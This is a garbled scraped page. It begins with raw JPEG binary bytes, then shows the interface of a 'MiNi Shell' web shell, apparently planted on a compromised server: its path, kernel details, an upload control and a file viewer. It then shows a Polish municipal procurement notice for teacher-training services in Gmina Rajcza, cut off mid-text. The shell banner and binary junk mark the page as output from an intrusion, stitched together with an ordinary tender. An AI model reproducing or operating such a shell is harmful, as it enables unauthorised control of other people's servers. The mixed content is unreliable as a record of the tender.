JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250206/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250206/0009337301-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> &#34;Organizacja i przeprowadzenie szkoleń dla kadry pedagogicznej placówek oświatowych w Gminie Rajcza&#34; </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">GMINA RAJCZA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 072182692</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Górska 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rajcza</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">34-370</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL225 - Bielski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">ugrajcza@rajcza.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.rajcza.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> &#34;Organizacja i przeprowadzenie szkoleń dla kadry pedagogicznej placówek oświatowych w Gminie Rajcza&#34; </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-a6659663-2112-4964-964c-50217af57710</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00093373</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-02-06</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Fundusze Europejskie dla Śląskiego 2021-2027 (Europejski Fundusz Społeczny+) dla Priorytetu: FESL.06.00-Fundusze Europejskie dla edukacji (szczegóły opisano w sekcji &#34;Informacje dodatkowe&#34; niniejszego ogłoszenia </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-a6659663-2112-4964-964c-50217af57710 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, odbywa się przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl oraz – w szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego – za pośrednictwem Platformy e-Zamówienia, elektronicznej skrzynki podawczej (ESP) na ePUAP: Urząd Gminy Rajcza /d43pji4r0h/skrytka oraz poczty elektronicznej ugrajcza@rajcza.com.pl.<br/>Szczegóły opisano w rozdziale X SWZ.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja w postępowaniu, z wyłączeniem składania ofert/wniosków o dopuszczenie do udziału w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). Wszystkie wysłane i odebrane w postępowaniu przez Wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza). Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa „Regulamin Platformy e-Zamówienia”.<br/>W przypadku problemów technicznych i awarii związanych z funkcjonowaniem Platformy e-Zamówienia użytkownicy mogą skorzystać ze wsparcia technicznego dostępnego pod numerem telefonu (22) 458 77 99 lub drogą elektroniczną poprzez formularz udostępniony na stronie internetowej https://ezamowienia.gov.pl w zakładce „Zgłoś problem”.<br/>Szczegóły opisano w rozdziale X SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.1.TPBN.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">7</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Przedszkole w Soli:<br/>1) Szkolenie stacjonarne: Terapia dzieci odrzuconych rówieśniczo, 3 nauczycieli. Cel: poznanie sposobów i narzędzi służących rozpoznawaniu potrzeb osoby w sytuacji trudnej, kryzysowej, traumatycznej– perspektywa szkoły i poradni, przyczyny odrzucenia rówieśniczego i jego przejawy, działania jakie można podjąć, by skutecznie pomóc dzieciom odrzucanym przez rówieśników w przedszkolu, zapobieganie odrzuceniu i wczesne wspomaganie rodziców w wypełnianiu ich opiekuńczej i wychowawczej roli, praca z grupą rówieśniczą w przedszkolu sprzyjająca rozwojowi tolerancji oraz pomaganie dziecku, gdy pojawią się problemy w relacjach z rówieśnikami.<br/>Planowana liczba godzin szkolenia: 12 godzin.<br/>2) Kurs on-line: Terapia ręki, 1 osoba. Cel: diagnoza sprawności motorycznej dziecka, planowanie i prowadzenie terapii ręki, masaż stymulacyjno-sensoryczny ręki.<br/>Planowana liczba godzin szkolenia: 16 godzin dydaktycznych + 10 godzin praktycznych zajęć.<br/>3) Szkolenie stacjonarne lub on-line: Elektrostymulacja w logopedii, 1 osoba. Cel: nabycie elektrostymulacja w logopedii, elektrostymulacje, aparat do elektrostymulacji: przygotowanie do zabiegu, rodzaje elektrod, parametry, elektrostymulacja w terapii pacjentów z wadami twarzoczaszki. <br/>Planowana liczba godzin szkolenia: 7 godzin.<br/>4) Szkolenie stacjonarne: Wielokulturowość w naszej szkole - wyzwania dla edukacji w XXI wieku, 3 nauczycieli. Cel: zapoznanie nauczycieli z modelem działań edukacyjnych uwzględniającym potrzeby różnych grup kulturowych zamieszkujących w określonym środowisku, motywujący je do aktywnego uczestnictwa w życiu społecznym. <br/>Planowana liczba godzin szkolenia: 4 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 – Punkt Przedszkolny przy Szkole Podstawowej w Rycerce Górnej:<br/>1) Szkolenie stacjonarne: Terapia dzieci odrzuconych rówieśniczo dla całej kadry, 6 osób. Cel: poznanie sposobów i narzędzi służących rozpoznawaniu potrzeb osoby w sytuacji trudnej, kryzysowej, traumatycznej– perspektywa szkoły i poradni, przyczyny odrzucenia rówieśniczego i jego przejawy, działania jakie można podjąć, by skutecznie pomóc dzieciom odrzucanym przez rówieśników w przedszkolu, zapobieganie odrzuceniu i wczesne wspomaganie rodziców w wypełnianiu ich opiekuńczej i wychowawczej roli, praca z grupą rówieśniczą w przedszkolu sprzyjająca rozwojowi tolerancji oraz pomaganie dziecku, gdy pojawią się problemy w relacjach z rówieśnikami. <br/>Planowana liczba godzin szkolenia: 12 godzin.<br/>2) Szkolenie stacjonarne: &#34;Przeciwdziałanie dyskryminacji, cyberprzemocy i mowie nienawiści&#34;, dla 6 osób. Cel: budowanie świadomości nauczycieli w zakresie poszanowania godności dziecka z powodu niepełnosprawności, rasy, pochodzenia etnicznego, płci, orientacji seksualnej, kształtowanie postaw szacunku i zrozumienia dla trudności, z którymi boryka się dziecko z powodu niepełnosprawności, pochodzenia etnicznego, płci, wrażliwienie nauczycieli na zjawisko wykluczenia, dyskryminacji. <br/>Planowana liczba godzin szkolenia: 4 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3 – Punkt Przedszkolny przy Szkole Podstawowej w Rycerce Dolnej:<br/>1) Szkolenie stacjonarne: Terapia dzieci odrzuconych rówieśniczo dla całej kadry, 4 osoby. Cel: poznanie sposobów i narzędzi służących rozpoznawaniu potrzeb osoby w sytuacji trudnej, kryzysowej, traumatycznej– perspektywa szkoły i poradni, przyczyny odrzucenia rówieśniczego i jego przejawy, działania jakie można podjąć, by skutecznie pomóc dzieciom odrzucanym przez rówieśników w przedszkolu, zapobieganie odrzuceniu i wczesne wspomaganie rodziców w wypełnianiu ich opiekuńczej i wychowawczej roli, praca z grupą rówieśniczą w przedszkolu sprzyjająca rozwojowi tolerancji oraz pomaganie dziecku, gdy pojawią się problemy w relacjach z rówieśnikami. <br/>Planowana liczba godzin szkolenia: 12 godzin.<br/>2) Szkolenie stacjonarne &#34;Przeciwdziałanie dyskryminacji, cyberprzemocy i mowie nienawiści&#34;, 4 osoby. Cel: budowanie świadomości nauczycieli w zakresie poszanowania godności dziecka z powodu niepełnosprawności, rasy, pochodzenia etnicznego, płci, orientacji seksualnej, kształtowanie postaw szacunku i zrozumienia dla trudności. <br/>Planowana liczba godzin szkolenia: 4 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4 –Przedszkole w Zwardoniu:<br/>1) Kurs stacjonarny lub on-line: Matematyka łatwa dla każdego, 2 osoby. Cel: przygotowanie nauczycieli do korzystania z narzędzi do tworzenia eksperymentów matematycznych. <br/>Planowana liczba godzin szkolenia: 20 godzin.<br/>2) Kurs on-line: Alternatywne formy komunikacji z uczniami z niepełnosprawnościami, 2 osoby. Cel: podstawowa wiedza dotycząca ACC, na czym polega komunikacja alternatywna i wspomagająca poziomy rozwoju kompetencji komunikacyjnych dziecka, sposoby porozumiewania się dziecka oraz ich rola w jego życiu, jak dokonać diagnozy możliwości komunikacji dziecka, podstawowe pomoce ułatwiające porozumiewanie się, wybrane techniki nauki używania znaków i symboli, Metoda Ułatwionej Komunikacji, Jak dobrać właściwą metodę komunikacji do poziomu możliwości komunikacyjnych dziecka. <br/>Planowana liczba godzin szkolenia: 4 godziny.<br/>3) Szkolenie stacjonarne: Terapia dzieci odrzuconych rówieśniczo, 7 osób. Cel: poznanie sposobów i narzędzi służących rozpoznawaniu potrzeb osoby w sytuacji trudnej, kryzysowej, traumatycznej– perspektywa szkoły i poradni, przyczyny odrzucenia rówieśniczego i jego przejawy, działania jakie można podjąć, by skutecznie pomóc dzieciom odrzucanym przez rówieśników w przedszkolu, zapobieganie odrzuceniu i wczesne wspomaganie rodziców w wypełnianiu ich opiekuńczej i wychowawczej roli, praca z grupą rówieśniczą w przedszkolu sprzyjająca rozwojowi tolerancji oraz pomaganie dziecku, gdy pojawią się problemy w relacjach z rówieśnikami. <br/>Planowana liczba godzin szkolenia: 12 godzin.<br/>4) Szkolenie on-line: Inżynieria w przedszkolu, czyli STEAM w praktyce, 7 osób. Cel: umiejętność planowania i organizacji zajęć przedszkolnych z wykorzystaniem STEAM, cztery propozycje gotowych zajęć STEAM dla każdej pory roku. <br/>Planowana liczba godzin szkolenia: 3 godziny. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80400000-8 - Usługi edukacji osób dorosłych oraz inne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-04-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 5 –Przedszkole w Rajczy:<br/>1) Szkolenie stacjonarne: Terapia dzieci odrzuconych rówieśniczo, 15 osób. Program: poznanie sposobów i narzędzi służących rozpoznawaniu potrzeb osoby w sytuacji trudnej, kryzysowej, traumatycznej– perspektywa szkoły i poradni, przyczyny odrzucenia rówieśniczego i jego przejawy, działania jakie można podjąć, by skutecznie pomóc dzieciom odrzucanym przez rówieśników w przedszkolu, zapobieganie odrzuceniu i wczesne wspomaganie rodziców w wypełnianiu ich opiekuńczej i wychowawczej roli, praca z grupą rówieśniczą w przedszkolu sprzyjająca rozwojowi tolerancji oraz pomaganie dziecku, gdy pojawią się problemy w relacjach z rówieśnikami. <br/>Planowana liczba godzin szkolenia: 12 godzin.<br/>2) Kurs on-line: Elektrostymulacja w logopedii -kurs on-line, 1 osoba. Program: elektrostymulacja w logopedii, elektrostymulacje, aparat do elektrostymulacji: przygotowanie do zabiegu, rodzaje elektrod, parametry, elektrostymulacja w terapii pacjentów z wadami twarzoczaszki. <br/>Planowana liczba godzin szkolenia: 8 godzin.<br/>3) Kurs on-line: Kids&#39; Skills - kurs on-line, 1 osoba. Program: innowacyjny program pomagania dzieciom w przezwyciężaniu problemów emocjonalnych i behawioralnych, takich jak lęki, złe nawyki, problemy ze snem, problemy z koncentracją, napady złości, trudności z chodzeniem do toalety, i wiele innych problemów typowych dla dzieci. Planowana liczba godzin szkolenia: 30 godzin.<br/>4) Terapia Skoncentrowana na Rozwiązaniach (I i II stopień) - on-line/stacjonarnie, 1 osoba. Cele szkolenia I st.: Poznanie 